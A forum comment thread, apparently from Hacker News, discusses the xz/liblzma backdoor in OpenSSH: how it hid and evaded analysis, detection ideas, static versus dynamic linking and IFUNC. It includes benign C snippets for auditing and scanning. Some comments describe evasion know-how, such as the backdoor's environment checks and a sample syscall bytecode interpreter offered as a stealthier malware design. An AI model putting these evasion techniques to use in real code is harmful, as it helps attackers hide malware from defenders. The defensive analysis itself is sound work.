... and stop adding random patches to upstream software, especially when we're talking about security-critical stuff that must absolutely not be released without a very thorough security review.
Right, though if I'm understanding correctly, this is targeting openssl, not just sshd. So there's a larger set of circumstances where this could have been exploited. I'm not sure if it's yet been confirmed that this is confined only to sshd.
The exploit, as currently found, seems to target OpenSSH specifically. It's possible that everything involving xz has been compromised, but I haven't read any reports that there is a path to malware execution outside of OpenSSH.
> Initially starting sshd outside of systemd did not show the slowdown, despite the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder.
> a) TERM environment variable is not set
> b) argv[0] needs to be /usr/sbin/sshd
> c) LD_DEBUG, LD_PROFILE are not set
> d) LANG needs to be set
> e) Some debugging environments, like rr, appear to be detected. Plain gdb appears to be detected in some situations, but not others
Would that help? sshd, by design, opens shells. The backdoor payload was basically to open a shell. That is, the very thing that sshd has to do.
The pledge/unveil system is pretty great, but my understanding is that it does not do anything that the Linux equivalent interfaces (seccomp, I think) cannot do. It is just a simplified/saner interface to the same problem of "how can a program tell the kernel what its scope is?" The main advantage pledge/unveil bring to the table is that they are easy to use and cannot be turned off; optional security isn't.
By design, OpenSSH will start an interactive shell with either the capabilities to escalate to root or direct root permissions. I don't think pledge/unveil will work any better than seccomp already does.
I do like the pledge/unveil API, but I don't think it would've made much of a difference.
There's a reasonably high chance this was to target a specific machine, or perhaps a specific organization's set of machines. After that it could probably be sold off once whatever they were using it for was finished.
I doubt we'll ever know the intention unless the ABC's throw us a bone and tell us the results of their investigation (assuming they're not the ones behind it).
Classic example of this being Stuxnet, a worm that exploited four(!) different 0-days and infected hundreds of thousands of computers with the ultimate goal of destroying centrifuges associated with Iran’s nuclear program.
Government organizations have many different teams. One might develop vulnerabilities while another runs operations with oversight for approving use of exploits and picking targets. Think bureaucracy with different project teams and some multi-layered management coordinating strategy at some level.
There aren’t a billion computers running ssh servers and the ones that do should not be exposed to the general internet. This is a stark reminder of why defense in depth matters.
One question I have on this is: if the backdoor had not been discovered due to the performance issue (which was, as I understood it, purely an oversight/fixable deficiency in the code), what are the chances of discovering this backdoor later, or are there tools that would have picked it up? Those questions are IMO relevant to understanding whether this kind of backdoor is the first one of its kind, or just the first one that was uncovered.
Having worked for about a year in an environment that was exposed to a high volume of malevolent IT actors (and some pretty scary ones), I’d say: discovery chances were always pretty high.
Keeping a veil of secrecy requires an unimaginable amount of energy. The same goes for keeping a story consistent. One little slip and everything comes to nothing. Sometimes a single sentence can start a chain reaction and uncover a meticulously crafted plan.
That’s how crime is fought every day. And whereas police work has limited resources, software is analyzed daily by hobbyists as a hobby, by professionals who still do it as a hobby, and by professionals for professional reasons.
Discovery was bound to happen eventually.
The XZ attack was very well executed. It’s a masterpiece. I wouldn’t be surprised if some state agency were involved. But it was also incredibly lucky. I know for sure that I, and also many of my colleagues, would have gone on a long journey if we had found any of the issues that are being flagged right now.
One takeaway is that finding such an issue would be impossible if xz/liblzma weren’t open source (and yes, I am also aware that open source enabled it in the first place), but imagine this existing in Windows or macOS.
I bet in the majority of cases, there's no need to pressure for merging.
In a big company it's much easier to slip it in. Code seemingly less relevant for security is often not reviewed by a lot of people. Also, often people don't really care and just sign it off without a closer look.
And when it's merged, no one will ever look at it again, other than with FOSS.
An insider could just be tasked to look for exploitable vulnerabilities in existing code and compile this information for outside entities without ever having to risk inserting a purpose-made backdoor. Considering the security state of most large codebases, there would be a bottomless well of them.
I've read about workplaces that were compromised with multiple people - they would hire a compromised manager, who would then install one or two developers, and shape the environment for them to prevent discovery, which would make these kind of exploits trivial.
Another independent maintainer would have helped too. Many eyes make bugs shallow, but just one extra genuine maintainer would have helped enormously. Clearly the existing maintainer trusted the attacker completely, but a second maintainer would not have. That's another social dimension to this attack: doing enough real work to suppress other maintainers coming along.
If the exploit wasn't being used, the odds would be pretty low. They picked the right place to bury it (i.e., effectively outside the codebase, where no auditor ever looks).
That said, if you're not using it, it defeats the purpose. And the more you're using it, the higher the likelihood you will be detected down the line. Compare to Solarwinds.
There is no ‘system()’ syscall, and fork/exec would be extremely common for opensshd — it’s what it does to spawn new shells which go on to do anything.
I’m not arguing with the point, but this is a great place to hide — very difficult to have meaningful detection rules even for a sophisticated sysadmin.
It’s true that there’s a precise set of circumstances that would be different for the RCE (the lack of a PAM dance prior, same process group & session, no allocation of a pseudo-terminal, etc.). My point was merely that I don’t think they are commonly encoded in rule sets or detection systems.
It’s certainly possible, but my guess is sshd is likely to have a lot of open policy. I’m really curious if someone knows different and there are hard detection for those things. (Either way, I bet there will be in the future!)
I am trying to figure out if auditctl is expressive enough to catch unexpected execve() from sshd: basically anything other than /usr/bin/sshd (for privsep) executed with auid=-1 should be suspicious.
With sufficient data points, you can do A/B and see that all affected systems run a specific version of Linux distro, and eventually track it down to a particular package.
Unless you're the bad actor, you have no way to trigger the exploit, so you can't really do an a/b test. You can only confirm which versions of which distros are vulnerable. And that assumes you have sufficient instrumentation in place to know the exploit has been triggered.
Even then, who actually has a massive fleet of publicly exposed servers all running a mix of distros/versions? You might run a small handful of distros, but I suspect anyone running a fleet large enough to actually collect a substantial amount of data probably also has tools to upgrade the whole fleet (or at least large swaths) in one go. Certainly there are companies where updates are the wild west, but the odds that they're all accessible to and controllable by a single motivated individual who can detect the exploit are essentially zero.
Those connection attempts wouldn't ever reach the daemon though, let alone get to preauth. So how would an exploitation attempt even be distinguishable from, say, a harmless random password guess if neither ever gets to see the daemon?
> That said, if you're not using it, it defeats the purpose.
Not if this was injected by a state actor. My experience with other examples of state actor interference in critical infrastructure, is that the exploit is not used. It’s there as a capability to be leveraged only in the context of military action.
Why do non-friendly state actors (apparently) not detect and eliminate exploits like this one?
Supposedly, they should have the same kind of budgets for code review (or even more, if we combine all budgets of all non-friendly state actors, given the fact that we are talking about open-source code).
When a state actor says "We found this exploit", people will get paranoid and wonder whether the fix is actually an exploit.
Not saying it happened in this case, but it's really easy for a state actor to hide an extensive audit behind some parallel construction. Just create a cover story pretending to be a random user who randomly noticed ssh logins being slow, and use that story to point maintainers to the problem, without triggering anyone's paranoia, or giving other state actors evidence of your auditing capabilities.
If a government is competent enough to detect this, they're competent enough to add it to their very own cyberweapon stockpile.
They wouldn't be able to do that for this particular exploit since it requires successfully decrypting data encrypted by the attacker's secret key. A zero day caused by an accidental bug though? There's no reason for them to eliminate the threat by disclosing it. They can patch their own systems and add yet another exploit to their hoard.
"Their own systems" will necessarily include lots of civilian infrastructure. Hard to make sure all that gets patched without issuing a CVE, let alone without anyone in the general public even being aware of the patch.
> That said, if you're not using it, it defeats the purpose.
Not always. Weapons of war are most useful when you don't have to actually use them, because others know that you have it. This exploit could be used sparingly to boost a reputation of a state-level actor. Of course, other parties wouldn't know about this particular exploit, but they would see your cyber capabilities in the rare occasions where you decided to use it.
Hmmh, brings up the question, if no exploit actually occurred, was a crime committed? Can't the authors claim that they were testing how quickly the community of a thousand eyes would react, you know, for science?
That's like asking if someone who went into a crowded place with a full-automatic and started shooting at people, while "purposefully missing", is just testing how fast law enforcement reacts, you know, for science.
After something like 2 years of planning this out and targeted changes this isn't something "just done for science".
It’s more analogous to getting hired at the lock company and sabotaging the locks you assemble to be trivially pickable if you know the right trick.
The University of Minnesota case is an interesting one to compare to. I could imagine them being criminally liable but being given a lenient punishment. I wonder if the law will end up being amended to better cover this, if it isn’t already explicitly illegal.
I think behavioral analysis could be promising. There's a lot of weird stuff this code does on startup that any reasonable Debian package on the average install should not be doing in a million years.
Games and proprietary software will sometimes ship with DRM protection layers that do insane things in the name of obfuscation, making it hard to distinguish from malware.
But (with only a couple exceptions) there's no reason for a binary or library in a Debian package to ever try to write the PLT outside of the normal mechanism, to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures, to do anti-debug tricks, or just to have any kind of obfuscation or packing that free software packaged for a distro is not supposed to have.
Some of these may be (much) more difficult to detect than others, some might not be realistic. But there are several plausible different ways a scanner could have detected something weird going on in memory during ssh startup.
No one wants a Linux antivirus. But I think everyone would benefit from throwing all the behavioral analysis we can come up with at new Debian package uploads. We're very lucky someone noticed this one; we may not have the same luck next time.
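As one concrete (and admittedly easy-to-evade) building block for such a scanner, the dynamic linker's own audit interface can log where every symbol actually binds. A minimal rtld-audit module might look like this; x86-64/glibc assumed, and the build/run lines in the comment are illustrative:

```c
/* Minimal LD_AUDIT (rtld-audit) module that logs every PLT symbol binding,
 * i.e. which object each symbol actually resolves from. Build/run roughly:
 *   gcc -shared -fPIC -o auditlog.so auditlog.c
 *   LD_AUDIT=./auditlog.so /usr/sbin/sshd -t
 * A real scanner would filter for suspicious binds, e.g. crypto symbols
 * resolving from a compression library. */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <link.h>
#include <stdint.h>
#include <stdio.h>

unsigned int la_version(unsigned int version)
{
    (void)version;
    return LAV_CURRENT;                 /* accept the linker's audit ABI */
}

unsigned int la_objopen(struct link_map *map, Lmid_t lmid, uintptr_t *cookie)
{
    (void)lmid;
    *cookie = (uintptr_t)map->l_name;   /* remember this object's path */
    return LA_FLG_BINDTO | LA_FLG_BINDFROM;   /* audit bindings both ways */
}

uintptr_t la_symbind64(Elf64_Sym *sym, unsigned int ndx,
                       uintptr_t *refcook, uintptr_t *defcook,
                       unsigned int *flags, const char *symname)
{
    (void)ndx; (void)flags;
    fprintf(stderr, "bind %-30s %s -> %s\n", symname,
            (const char *)*refcook, (const char *)*defcook);
    return sym->st_value;               /* leave the binding untouched */
}
```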
Except had we been doing that they would have put guards in place to detect it - as they already had guards to avoid the code path when a debugger is attached, to avoid building the payload in when it's not one of the target systems, and so on. Their evasion was fairly extensive, so we'd need many novel dynamic systems to stand a chance, and we'd have to guard those systems extremely tightly - the author got patches into oss-fuzz as well to "squash false positives". All in all, adding more arms to the arms race does raise the bar, but the bar they surpassed already demonstrated tenacity, long term thinking, and significant defense and detection evasion efforts.
I broadly agree, but I think we can draw a parallel with the arms race of new exploit techniques versus exploit protection.
People still manage to write exploits today, but now you must find an ASLR leak, you must chain enough primitives to work around multiple layers of protection, it's generally a huge pain to write exploits compared to the 90s.
Today the dynamic detection that we have for Linux packages seems thin to non-existent, like the arms race has not even started yet. I think there is a bit of low-hanging fruit to make attacker lives harder (and some much higher-hanging fruit that would be a real headache).
Luckily there is an asymmetry in favor of the defenders (for once). If we create a scanner, we do not _have_ to publish every type of scan it knows how to do. Much like companies fighting spammers and fraud don't detail exactly how they catch bad actors. (Or, for another example, I know the Tor project has a similar asymmetry to detect bad relays. They collaborate on their relay scanner internally, but no one externally knows all the details.)
This is an arms race that is largely won by attackers, actually. Sophisticated attacks are caught by them sometimes but usually the author has far more knowledge or cleverer tricks than the person implementing the checks, who is limited by their imagination of what they think an attacker might do.
Yeah, perhaps something akin to an OSS variant of virustotal's multi-vendor analysis. I'm still not sure it would catch this, but as you say, raising the bar isn't something we tend to regret.
If the prior is 1 was out there (this one), the chances that there is 1+ still undetected seems fairly high to me.
To behaviourally detect this requires many independent actors to be looking in independent ways (e.g. security researchers, internal teams). Edit: I mean with private code & tests (not open source, nor purchasable antivirus). It's not easy to donate to Google Zero. Some of the best funded and most skilled teams seem to be antivirus vendors (and high value person protection). I hate the antivirus industry yet I've been helped by it (the anti-tragedy of the commons).
Commonly public detection code (e.g. open source) is likely to be defeated by attackers with a lot of resources.
Hard to protect ourselves against countries where the individuals are safe from prosecution. Even nefarious means like assasination likely only work against individuals and not teams.
I think you’re saying “I would be surprised if there is only 1 exploit like this that already exists” which is what the previous comment was also saying. “If the prior is one” is often used to mean “we know for sure that there is one”.
> to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures
I want to name one thing: when Windows fails to load a DLL because a dependency is missing, it doesn't tell you what was missing. To get that information, you have to interact with the DLL loader through low-level Windows APIs. In some circumstances Linux apps may also have this need, e.g. for printing a user-friendly error message or recovering from a non-fatal error. For example, the patchelf tool that is used for building portable Python packages.
> No one wants a Linux antivirus
That's not true. Actually, this kind of software is very popular in enterprise settings.
A cloud provider can take snapshots of running VMs and then run antivirus scans offline to minimize the impact on customers.
Similarly, many applications are containerized and the containers are stateless, so we can scan the Docker images instead. This approach is quite mature.
In general, my gut feeling is that the majority of ClamAV installations are configured to scan for Windows viruses in user-submitted content. Email, hosting sites, etc.
To say nothing of enterprise EDR/XDR solutions that have linux versions. These things aren’t bulletproof but can be 1 layer in your multilayer security posture.
ClamAV also has a lot of findings when scanning some open source projects' source code, for example the LLVM project's test data. Because some of the test data are meant to check that a known security bug is fixed, from an antivirus perspective these data files can be seen as exploits. ClamAV is commonly used, and I would suggest adding it to every CI build pipeline. Most of the time it won't have any findings, but it is better than nothing. I would like to offer free help if an open source project needs to harden their build pipelines and release process.
If you think about it, this is a data-provenance problem though. The exploit was hidden in "test" code which gets included in release code by compiler flags.
Now, if there was a proper chain of accountability for data, then this wouldn't have been possible to hide the way it is - any amount of pre-processing resulting in the release tarball including derived products of "test" files would be suspicious.
The problem is we don't actually track data provenance like this - no build system does. The most we do is <git hash in> -> <some deterministic bits out>. But we don't include the human-readable data which explains how that transform happens at enough levels.
You don’t need to go to that extent even - simply properly segregating test resources from dist resources would have prevented this, and that’s something Java has been doing for 20 years.
It’s not sufficient against a determined attacker, but it does demonstrate just how unserious the C world is about their build engineering.
I literally can’t think of a single time in 15 years of work that I’ve ever seen a reason for a dist build to need test resources. That’s at best a bug - if it’s a dist resource it goes in the dist resources, not test. And if the tooling doesn’t do a good job of making that mistake difficult… it’s bad tooling.
I'm really surprised they did a call to system() rather than just implement a tiny bytecode interpreter.
A bytecode interpreter that can call syscalls can be just a few hundred bytes of code, and means you can avoid calling system() (whose calls might be logged), and avoid calling mprotect to make code executable (also something likely to raise security red flags).
The only downside of a bytecode interpreter is that the whole of the rest of your malware needs to be compiled to your custom bytecode to get the benefits, and you will take a pretty big performance hit. Unless you're streaming the user's webcam, that probably isn't an issue tho.
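For a sense of scale, a syscall-capable interpreter really is tiny. A hedged toy sketch (three made-up opcodes; no relation to any real malware):

```c
/* Toy bytecode interpreter whose only opcodes load 64-bit immediates into
 * argument slots and invoke syscall(2). It just shows why such an
 * interpreter can be a few hundred bytes of code. */
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

enum { OP_HALT, OP_SETARG, OP_SYSCALL };

static long run(const uint8_t *code, size_t len)
{
    long arg[7] = {0};   /* arg[0] = syscall number, arg[1..6] = arguments */
    long last = 0;
    size_t pc = 0;

    while (pc < len) {
        switch (code[pc++]) {
        case OP_HALT:
            return last;
        case OP_SETARG: {                    /* SETARG <idx> <imm64> */
            uint8_t idx = code[pc++] % 7;
            int64_t imm;
            memcpy(&imm, code + pc, sizeof imm);
            pc += sizeof imm;
            arg[idx] = (long)imm;
            break;
        }
        case OP_SYSCALL:                     /* invoke syscall(arg[0], ...) */
            last = syscall(arg[0], arg[1], arg[2], arg[3],
                           arg[4], arg[5], arg[6]);
            break;
        default:
            return -1;
        }
    }
    return last;
}

static size_t emit_setarg(uint8_t *p, uint8_t idx, int64_t imm)
{
    p[0] = OP_SETARG; p[1] = idx;
    memcpy(p + 2, &imm, sizeof imm);
    return 2 + sizeof imm;
}

int main(void)
{
    static const char msg[] = "hello from bytecode\n";
    uint8_t prog[64];
    size_t n = 0;

    /* encode: write(1, msg, strlen(msg)); halt */
    n += emit_setarg(prog + n, 0, SYS_write);
    n += emit_setarg(prog + n, 1, 1);
    n += emit_setarg(prog + n, 2, (int64_t)(intptr_t)msg);
    n += emit_setarg(prog + n, 3, (int64_t)(sizeof msg - 1));
    prog[n++] = OP_SYSCALL;
    prog[n++] = OP_HALT;

    return run(prog, n) < 0;
}
```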
I’ve been building Packj [1] to detect malicious PyPI/NPM/Ruby/PHP/etc. dependencies using behavioral analysis. It uses static+dynamic code analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect bad actors (e.g., typo squatting).
The real problem was doing expensive math for every connection. If it had relied on a cookie or some simpler-to-compute pre-filter, no one would have been the wiser.
The slowdown is actually in the startup of the backdoor, not when it's actually performing authentication. Note how in the original report even sshd -h (called in the right environment to circumvent countermeasures) is slow.
Wow. Given the otherwise extreme sophistication this is such a blunder. I imagine the adversary is tearing their hair out over this. 2-3 years of full time infiltration work down the drain, for probably more than a single person.
As for the rest of us, we got lucky. In fact, it’s quite hilarious that some grump who’s thanklessly perf testing other people’s code is like “no like, exploit makes my system slower”.
Andres is one of the most prolific PostgreSQL committers and his depth of understanding of systems performance is second to none. I wouldn't have guessed he would one day save the world with it, but there you go.
That this was dynamically linked is the least interesting thing about it IMO. It was a long term I filtration where they got legitimate commit access to a well used library.
If xz was statically linked in some way, or just used as an executa Le to compress something (like the kernel), the same problems exist and no dynamic linking would need to be involved.
> If xz was statically linked in some way, or just used as an executa Le to compress something (like the kernel), the same problems exist and no dynamic linking would need to be involved.
Even more so: all binaries dynamically linking xz can be updated by installing a fixed library version. For statically linked binaries, not so much - each individual binary would have to be relinked. Good luck with that.
In exchange, each binary can be audited as a final product on its own merits, rather than leaving the final symbols-in-memory open to all kinds of dubious manipulation.
Not true; it would be much harder to hook into openssl functions if the final executable were static [1]. The only way would be if the openssl function this attack targeted actually called a function from libxz.
Dynamic loading is a relic of the past and the cause of many headaches in the Linux ecosystem. In this case it also obfuscates the execution path of the code, so you can't really rely on the code you are reading. Unfortunately I don't think it's possible to completely get rid of dynamic loading, as some components such as GPU drivers require it, but it should be reduced to a minimum.
This particular approach of hooking would be much harder; but a malicious xz has other options as well.
It's already in the code path used by dpkg when unpacking packages for security updates, so it could just modify the sshd binary, or maybe add a rootkit to the next kernel security update.
It seems foolish to change our systems to stop one of the steps the attacker used after their code was already running as root; the attacker can just pick something else; as root they have essentially unlimited options.
True, but such code changes in xz would be much easier to audit than all the dynamic loading shenanigans, even if obfuscated in the build system. GNU's dynamic loader especially has grown very complicated (having all these OOP-like polymorphism features at the linker/loader level...), and I think we should tone down the usage of dynamic linking, as I see it as low-hanging fruit for attacks in general.
There are other reasons to change, though. The main thing to consider here is that static linking is the "OG" way of doing things, and also the simplest and the most easily understandable one. There are also obvious perf benefits to it when it comes to optimizing compilers.
On the other hand, dynamic linking was originally more or less just a hack to deal with memory-restricted environments in the face of growing amounts of code. It was necessary at the time because we simply wouldn't have things like X or Windows without it way back when.
But RAM is nowhere near as scarce these days, and it could be even less so if there was a concerted push on hardware vendors to stop skimping on it. So why don't we remove the hack and get back to a simple model that is much easier to understand, implement, and audit?
Agreed - it's difficult to believe that people believe in dynamic linking so strongly that they are unwilling to consider abandoning it, even in the face of obvious problems like this xz situation.
Looking at IFUNC, there never seems to be a reason to allow function loading from a different library than the one the call is in, right? Maybe a restriction like that could be built in. Or just explicitly enumerate the possible substitutions per site.
IFUNC isn't used directly to patch the functions of another library here, it's just the entry point for the exploit code. IFUNC is used as opposed to other ways to execute code on library load because it runs very early (before linking tables are remapped read-only).
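For anyone who hasn't run into IFUNC before, here's a minimal benign example of the mechanism being discussed. The resolver runs while the dynamic linker is resolving symbols, i.e. before main(), which is exactly the early-execution property the backdoor abuses. This is GCC/glibc-specific and all names are made up for the demo.

    /* ifunc_demo.c - minimal GNU IFUNC example (GCC/glibc specific). */
    #include <stdio.h>

    static int impl_plain(void) { return 1; }
    static int impl_fancy(void) { return 2; }

    static int use_fancy = 1;

    /* The resolver runs at dynamic-link time, before main() and before the
     * relocation tables are remapped read-only. A benign resolver picks an
     * implementation (e.g. by CPU feature); a malicious one can start
     * tampering with the process right here. */
    static int (*resolve_pick(void))(void)
    {
        return use_fancy ? impl_fancy : impl_plain;
    }

    /* Bind the symbol "pick" through the resolver above. */
    int pick(void) __attribute__((ifunc("resolve_pick")));

    int main(void)
    {
        printf("pick() returned %d\n", pick());   /* prints 2 */
        return 0;
    }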
Yes, the dynamic linker (/lib/ld-linux.so.2), which is one relatively short program as opposed to thousands of big ones. :)
The point is, there's simply no usecase to require or even allow the program to do IFUNC substitution freely on its own. A programming framework should not opt the developer in to capabilities they don't want or need. Much of C-likes' complexity arises from unnecessary, mandated capabilities.
I mean dynamic loader is part of the base system and you generally trust the compiler and linker you build the program with. If any of those are malicious, you've already lost the game.
Asking a programmer to trust his own compiler and libraries which he can personally analyze and vouch for (static linking) is much different than asking the programmer to vouch for the dynamic libraries present on some given user’s machine.
Think whatever you shall about systemd of course, but please stop with the blind belief mud slinging:
- systemd didn't create the patch to include libsystemd, distros did
- current systemd versions already remove liblzma from their dependencies, the affected distros are behind on systemd updates though
- you can implement notify in standalone code with about the same effort as it takes to use the dependency (see the sketch after this list), so there wasn't really a good reason for distros to be adding this dependency to such a critical binary. systemd documents the protocol independently to make this easy. Distros carrying sketchy patches to sshd has a long history - remember the Debian weak key fiasco?
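To back up the standalone-notify point: the readiness protocol is essentially "write a datagram to the AF_UNIX socket named in $NOTIFY_SOCKET". A rough, dependency-free sketch follows; treat it as an approximation of what sd_notify(0, "READY=1") does, not a drop-in replacement.

    /* notify.c - minimal standalone READY=1 notification, no libsystemd. */
    #define _GNU_SOURCE
    #include <stddef.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    #include <unistd.h>

    int notify_ready(void)
    {
        const char *path = getenv("NOTIFY_SOCKET");
        if (!path || !*path)
            return 0;                       /* not under systemd: silently no-op */

        struct sockaddr_un addr;
        memset(&addr, 0, sizeof addr);
        addr.sun_family = AF_UNIX;
        if (strlen(path) >= sizeof addr.sun_path)
            return -1;
        strncpy(addr.sun_path, path, sizeof addr.sun_path - 1);
        if (addr.sun_path[0] == '@')        /* abstract-namespace socket */
            addr.sun_path[0] = '\0';
        socklen_t addrlen = offsetof(struct sockaddr_un, sun_path) + strlen(path);

        int fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
        if (fd < 0)
            return -1;

        const char *msg = "READY=1";
        ssize_t r = sendto(fd, msg, strlen(msg), 0,
                           (struct sockaddr *)&addr, addrlen);
        close(fd);
        return r < 0 ? -1 : 0;
    }

A few dozen lines, versus pulling a whole library and its transitive dependencies into the address space of one of the most attacked daemons on the internet.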
I wonder if the fact they "had" to use a dependency and jump through a number of hoops suggests they're not involved in the conspiracy? If they had that sort of access and effort, surely systemd itself would be an easier target?
But that's not saying this is the only conspiracy, maybe there's hundreds of other similar things in published code right now, and one was noticed soon after introduction merely due to luck.
I'm not bitter, I'm wary of systemd in a security context. Their vulns seem to be a result of poor choices made deliberately rather than mistakes or sloppy coding (e.g. defaulting to running units as root when the UID/username couldn't be parsed). Lennart was staunchly anti-CVE, which to me seems again like making a deliberate choice that will only hinder a secure implementation.
I haven't followed systemd too closely, has their stance on CVEs at least evolved?
I think this would’ve been difficult to catch because the patching of sshd happens during linking, when it’s permissible, and if this is correct then it’s not a master key backdoor, so there is no regular login audit trail. And sshd would of course be allowed to start other processes. A very tight SELinux policy could catch sshd executing something that ain’t a shell but hardening to that degree would be extremely rare I assume.
As for being discovered outside the target, well we tried that exercise already, didn’t we? A bunch of people stared at the payload with valgrind et al and didn’t see it. It’s also fairly well protected from being discovered in debugging environments, because the overt infrastructure underlying the payload is incompatible with ASan and friends. And even if it is linked in, the code runs long before main(), so even if you were prodding around near or in liblzma with a debugger you wouldn’t normally observe it execute.
Edit: sibling suggests strace - yes, you can see all syscalls after the process is spawned and you can watch the linker work. But from what I've gathered the payload isn't making any syscalls at that stage to determine whether to activate, it's just looking at argv and environ etc.
One idea may be to create a patched version of ld-linux itself with added sanity checks while the process loads.
For something much more heavy-handed, force the pages in sensitive sections to fault, either in the kernel or in a hypervisor. Then look at where the access is coming from in the page fault handler.
I don't think you can reliably differentiate a backdoor executing a command, and a legitimate user logged in with ssh running a command once the backdoor is already installed. But the way backdoors install themselves is where they really break the rules.
Since a liblzma backdoor could be used to modify compiler packages that are installed on some distributions, it gets right back to a trusting trust attack.
Although initial detection via e.g. strace would be possible, if the backdoor was later removed or went quiescent, it would be full trusting-trust territory.
How would this be possible? This backdoor works because lzma is loaded into sshd (by a roundabout method involving systemd). I don't think gcc or clang links lzma.
To be fair neither does sshd. But I'm sure someone somewhere has a good reason for gcc to write status via journald or something like that? There's however no reason to limit yourself to gcc for a supply chain attack like this.
In any non trivial build system, there's going to be lots of third party things involved. Especially when you include tests in the build. Is Python invoked somewhere along the build chain? That's like a dozen libraries loaded already.
Nothing is gained from protecting against an exact replica of this attack, but from this family of attacks.
At least for some comic relief I'd like to imagine Jia's boss slapping him and saying something like "you idiot, we worked on this for so many years and you couldn't have checked for any perf issues?"
But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
This was the backdoor we found. We found the backdoor with performance issues.
Whats more likely - that this is the only backdoor like this in linux, or that there are more out there and this is the one we happened to find?
I really hope someone is out there testing for all of this stuff in Linux:
- Look for system() calls in compiled binaries and check all of them
- Look for uses of IFUNC - specifically when a library uses IFUNC to replace other functions in the resulting executable (see the sketch after this list)
- Make a list of all the binaries/libraries that don't use Landlock, then grep the source code of all those projects and make sure none of them expect to be using Landlock.
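On the IFUNC point above, a sweep could start from something as simple as dumping STT_GNU_IFUNC symbols out of each binary's symbol tables (readelf -s will show them too). A rough sketch, assuming a native-endian 64-bit ELF and doing almost no validation:

    /* ifunc_scan.c - rough sketch: list STT_GNU_IFUNC symbols in a 64-bit ELF.
     * Starting point for a sweep, not a finished tool. */
    #include <elf.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        if (argc != 2) {
            fprintf(stderr, "usage: %s <elf-file>\n", argv[0]);
            return 1;
        }

        int fd = open(argv[1], O_RDONLY);
        struct stat st;
        if (fd < 0 || fstat(fd, &st) != 0)
            return 1;

        unsigned char *base = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (base == MAP_FAILED)
            return 1;

        Elf64_Ehdr *eh = (Elf64_Ehdr *)base;
        Elf64_Shdr *sh = (Elf64_Shdr *)(base + eh->e_shoff);

        /* Walk both .dynsym and .symtab, if present. */
        for (int i = 0; i < eh->e_shnum; i++) {
            if (sh[i].sh_type != SHT_DYNSYM && sh[i].sh_type != SHT_SYMTAB)
                continue;
            Elf64_Sym *syms = (Elf64_Sym *)(base + sh[i].sh_offset);
            const char *strtab = (const char *)(base + sh[sh[i].sh_link].sh_offset);
            size_t nsyms = sh[i].sh_size / sizeof(Elf64_Sym);

            for (size_t j = 0; j < nsyms; j++)
                if (ELF64_ST_TYPE(syms[j].st_info) == STT_GNU_IFUNC)
                    printf("IFUNC symbol: %s\n", strtab + syms[j].st_name);
        }

        munmap(base, st.st_size);
        close(fd);
        return 0;
    }

This only finds binaries that define IFUNCs at all; deciding whether a given resolver is legitimate is the hard, manual part.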
We have governments, which even in the face of budget crises and such tend to allocate enormous sums for "national security". Why not have them actually do something useful with that for once and do a manual line-by-line audit of all security-critical code that is underpinning our infrastructure?
ifunc was only used because it’s an obscure feature that is little-used and provides a way to convert a backdoor into easy execution. There are many others and it would be silly to try to catch them all.
Absolutely no intelligence agency would look at a successful compromise where they have a highly positioned agent in an organization like this, and burn them by rushing in an under-developed exploit that would become useless almost immediately (because the liblzma dependency would be dropped in the next distro upgrade cycle).
If you had a human asset with decision-making authority and trust in place, then as a funded organization with regular working hours, you'd simply can the project and start prototyping new potential uses.
Might a time-sensitive high-priority goal override such reasoning? For example, the US presidential election is coming up. Making it into Ubuntu LTS could be worth the risk if valuable government targets are running that.
Jia Tan tried to get his backdoored XZ into Ubuntu 24.04 just before the freeze, so that makes sense. Now is about the right time to get it into Fedora if he wants to backdoor RHEL 10, too.
But I don't think valuable government targets are in any hurry to upgrade. I wouldn't expect widespread adoption of 24.04, even in the private sector, until well after the U.S. election.
By the next election, though, everyone will be running it.
Edit: According to another comment [1], there would only have been a short window of vulnerability during which this attack would have worked, due to changes in systemd. This might have increased pressure on the attacker to act quickly.
> But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
Think about backdoors that are already present and will never be found out.
Probably the FBI for the public part of it, but if this wasn't a US owned operation you can be sure the CIA/NSA/military will do their own investigation.
> It's not actually unusual for three-letter US agencies to be at odds with one another.
I'd noticed that; this seems to have been the case for a long time. You'd think that having state security agencies at war with one another would be a disaster, but perhaps it's a feature: a sort of social "layered security". At any rate, it seems much better than having a bunch of state security agencies that all sing from the same songsheet.
It's a bog-standard practice, actually, even if you look very far back to the ancient world. Having a single agency responsible for the security of yourself and what you own is a bad idea: no matter how much you try to ensure the loyalty of the people in it, it's prone to, at the minimum, suppressing its own failures and magnifying its successes to make itself look better than it actually is, giving you a false sense of security. It is also the natural point from which to orchestrate a coup, which is something that can be used by your adversaries; but even without their involvement, the people working there eventually realize that they hold all the keys to the kingdom and there's little risk in just taking over.
So rulers in all ages tended to create multiple different security apparatuses for themselves and their states, and often actively encouraged rivalries between them, even if that makes them less efficient.
Backdoors can be placed in any type of software. For example, a GIMP plugin could connect to your display and read keystrokes, harvest passwords, etcetera. Utilities run by the superuser are of course even more potentially dangerous. Supply-chain attacks like these are just bound to happen. Perhaps not as often in SSH which is heavily scrutinized, but the consequences can be serious nevertheless.
Can I ask for why it wouldn't have been discovered if the obvious delay wasn't present? Wouldn't anyone profiling a running sshd (which I have to imagine someone out there is doing) see it spending all its crypto time in liblzma?
The situation certainly wouldn't be helped by the fact that this exploit targeted the systemd integration used by Debian and Red Hat. OpenSSH developers aren't likely to run that since they already rejected that patch for the increased attack surface. Hard to argue against, in retrospect. The attack also avoids activation under those conditions a profiler or debugger would run under.
